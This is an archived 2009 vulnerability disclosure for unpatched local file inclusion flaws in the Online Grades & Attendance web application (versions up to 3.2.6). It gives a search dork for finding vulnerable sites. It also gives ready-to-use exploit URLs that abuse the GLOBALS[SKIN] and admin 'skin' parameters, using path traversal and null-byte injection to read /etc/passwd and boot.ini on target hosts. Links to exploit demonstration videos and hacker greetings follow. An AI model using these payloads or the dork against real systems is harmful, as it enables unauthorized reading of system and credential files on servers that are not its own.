Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21934
HistoryJun 02, 2009 - 12:00 a.m.

MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES -- Online Grades & Attendance <= v-3.2.6 -->

2009-06-0200:00:00
vulners.com
10

MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES – Online Grades & Attendance v-3.2.6 –>

CMS INFORMATION:

–>WEB: http://www.onlinegrades.org/
–>DOWNLOAD: http://www.onlinegrades.org/
–>DEMO: http://www.onlinegrades.org/demo_info
–>CATEGORY: CMS / Education
–>DESCRIPTION: Online Grades is based on the project, Basmati. It has all of the same
features plus many new features. OG is a web based grade…
–>RELEASED: 2009-02-05

CMS VULNERABILITY:

–>TESTED ON: firefox 3
–>DORK: "Powered by Online Grades"
–>CATEGORY: LOCAL FILE INCLUSION (LFI)
–>AFFECT VERSION: <= 3.2.6
–>Discovered Bug date: 2009-05-21
–>Reported Bug date: 2009-05-21
–>Fixed bug date: Not fixed
–>Info patch: Not fixed
–>Author: YEnH4ckEr
–>mail: y3nh4ck3r[at]gmail[dot]com
–>WEB/BLOG: N/A
–>COMMENT: A mi novia Marijose…hermano,cunyada, padres (y amigos xD) por su apoyo.
–>EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

###########################
///////////////////////////

LOCAL FILE INCLUSION (LFI):

///////////////////////////
###########################

<<<<---------++++++++++++++ Condition: register global = ON ++++++++++++++++±-------->>>>

[++] var –> 'SKIN'


~~~~~&gt; http://[HOST]/[PATH]/?GLOBALS[SKIN]=../../../etc/passwd&#37;00



&lt;&lt;&lt;&lt;---------++++++++++++++ Condition: Be admin user +++++++++++++++++---------&gt;&gt;&gt;&gt;



[++] GET var --&gt; &#39;skin&#39;



~~~~~&gt; http://[HOST]/[PATH]/admin/admin.php?skin=../../../../../boot.ini&#37;00

~~~~~&gt; http://[HOST]/[PATH]/admin/admin.php?skin=../../../etc/passwd&#37;00


You can watch &quot;Online Grades&quot; exploits in action:

SQLi --&gt; http://www.youtube.com/watch?v=PWYh5254I4c
Credentials Changer  --&gt; http://www.youtube.com/watch?v=BhHpLicPcC0 
LFI/BSQLi --&gt; http://www.youtube.com/watch?v=Mlpve19l6_o
LFI/BSQLi --&gt; http://www.youtube.com/watch?v=6kt-NU98GXU


#######################################################################
#######################################################################
##*******************************************************************##
##  SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################